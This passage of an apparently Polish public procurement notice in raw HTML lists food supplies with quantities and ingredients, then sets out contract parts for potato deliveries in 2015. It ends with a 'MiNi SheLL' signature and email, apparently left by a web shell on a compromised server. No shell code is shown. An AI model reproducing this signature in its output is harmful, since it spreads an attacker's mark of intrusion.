68	Przyprawa bazylia	10g	szt	100
69	Przyprawa do gyrosa	20g	szt	150
70	Przyprawa do kurczaka	20g	szt	50
71	Przyprawa jarzynka	200g	szt	30
72	Przyprawa oregano	10g	szt	120
73	Przyprawa kurkuma mielona	20g	szt	10
74	Przyprawa do potraw meksykańskich	25g	szt	100
75	Przyprawa do chińszczyzny	25g	szt	100
76	Przyprawa curry	20g	szt	10
77	Przyprawa w płynie do zup i sosów
Skład: woda, sól, substancja wzmacniająca smak i zapach:glutaminian sodu:barwnik: karmel E150c: regulator kwasowości: kwas cytrynowy: ekstrakt z lubczyka, aromat	860ml netto	szt	50
78	Przyprawa warzywna
Skład: warzywa suszone 15% produkt nie może zawierać kaszki mannej 	1kg	szt	50
79	Rodzynki	200g	szt	100
80	Rodzynki w czekoladzie	80g	szt	150
81	Ryż biały długoziarnisty	1kg	kg	500
82	Sałatka szwedzka	840g	szt	100
83	Słonecznik łuskany	200g	szt	20
84	Sos do spaghetti w słoikach	350g	szt	20
85	Sos pieczarkowy w proszku	27g	szt	200
86	Sos pieczeniowy ciemny w proszku	27g	szt	80
87	Sos sałatkowy (różne smaki)	9g	szt	180
88	Sos słodko-kwaśny w słoikach	300g	szt	300
89	Sosy w różnych smakach w słoikach	300g	szt	40
90	Sól	1kg	szt	100
91	Syrop do napojów
wytworzony na bazie naturalnego zagęszczonego soku owocowego z dodatkiem wit. C
Skład: cukier, syrop glukozowy-fruktozowy, woda, zagęszczony sok, kwas cytrynowy, aromat, kwas askorbinowy, przeciwutleniacz 
Wartość energet. W 100ml syropu 348 kcal nie barwiący szklanek	500ml	szt	1300
92	Wafel przekładany kremem kakaowym w czekoladzie paczkowany, czekolada 28,5 %	39g	szt	600
93	Wiórki kokosowe	100g	szt	30
94	Woda mineralna  naturalna niegazowana
 1500 ml	1500ml	szt	70
95	Woda mineralna naturalna  niegazowana 500 ml	500ml	szt	300
96	Zagęszczacz do śmietany pozwalający utrzymać właściwą konsystencję bitej śmietany	9g	szt	50
97	Ziele angielskie	20g	szt	50
98	Zupa pieczarkowa w proszku	40g	szt	500
99	Żelatyna spożywcza	40g	szt	10
100	Żur naturalny zagęszczany
Skład: woda, mąka żytnia żurkowa (zawiera gluten) mąka pszenna, zakwas, czosnek, produkt naturalny otrzymany na drodze fermentacji mlekowej, pasteryzowany,	460g	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa ziemniaków jadalnych od stycznia do końca marca 2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki jadalne kg 3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> dostawa ziemniaków jadalnych od kwietnia do końca czerwca 2015r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki kg 4200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa ziemniaków jadalnych od lipca do końca sierpnia 2015r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki jadalne kg 700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> dostawa ziemniaków jadalnych od września do końca grudnia 2015r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki jadalne kg 5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com